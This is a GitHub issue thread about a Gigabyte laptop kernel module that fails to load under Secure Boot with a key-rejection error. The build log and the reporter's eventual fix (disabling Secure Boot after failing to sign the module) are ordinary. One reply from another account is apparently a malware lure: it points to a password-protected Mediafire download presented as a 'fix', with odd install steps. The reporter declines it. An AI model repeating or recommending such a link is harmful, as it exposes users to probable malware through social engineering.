tangalbert919/gigabyte-laptop-wmi #10: Can't install to kernel - signing issue

phildimond, 2024-08-27:
First, thanks for writing this! It has worked really well until recently. I tried reinstalling and all sort of the usual things, but I can't install the module to the kernel as it's complaining about the key. I'm guessing this is a system issue but asking here in case. Feel frtee to close out if nothing to do with the code itself.

Output:

phillip@PDAero-Ubuntu:~/source/Drivers/gigabyte-laptop-wmi$ make
make -C /lib/modules/6.8.0-40-generic/build M=/home/phillip/source/Drivers/gigabyte-laptop-wmi modules
make[1]: Entering directory '/usr/src/linux-headers-6.8.0-40-generic'
warning: the compiler differs from the one used to build the kernel
  The kernel was built by: x86_64-linux-gnu-gcc-12 (Ubuntu 12.3.0-1ubuntu1~22.04) 12.3.0
  You are using:           gcc-12 (Ubuntu 12.3.0-1ubuntu1~22.04) 12.3.0
  CC [M]  /home/phillip/source/Drivers/gigabyte-laptop-wmi/gigabyte-laptop.o
  MODPOST /home/phillip/source/Drivers/gigabyte-laptop-wmi/Module.symvers
  CC [M]  /home/phillip/source/Drivers/gigabyte-laptop-wmi/gigabyte-laptop.mod.o
  LD [M]  /home/phillip/source/Drivers/gigabyte-laptop-wmi/gigabyte-laptop.ko
  BTF [M] /home/phillip/source/Drivers/gigabyte-laptop-wmi/gigabyte-laptop.ko
Skipping BTF generation for /home/phillip/source/Drivers/gigabyte-laptop-wmi/gigabyte-laptop.ko due to unavailability of vmlinux
make[1]: Leaving directory '/usr/src/linux-headers-6.8.0-40-generic'

phillip@PDAero-Ubuntu:~/source/Drivers/gigabyte-laptop-wmi$ sudo insmod gigabyte-laptop.ko
insmod: ERROR: could not insert module gigabyte-laptop.ko: Key was rejected by service

System: Ubuntu 22.04, Gigabyte Aero15 i7-8750H

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

phildimond, 2024-08-27:
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

Thanks, but looking at that I've no idea what it is, so I'll pass if that's OK. 

The issue seems to simply be that for some reason my kernel now requires signed modules, when it didn't previously, so I'll need to set up keys and enrcypt the module before installing it. Working on that now.

phildimond, 2024-08-27:
I couldn't sort it out, I had to turn off secure boot. I tried signing the .ko but I couldn't get it to work. Followed https://ubuntu.com/blog/how-to-sign-things-for-secure-boot

phildimond, 2024-08-27:
Got it going, but it would have been nice to do it with secure boot still running.

closed 2024-08-27 by phildimond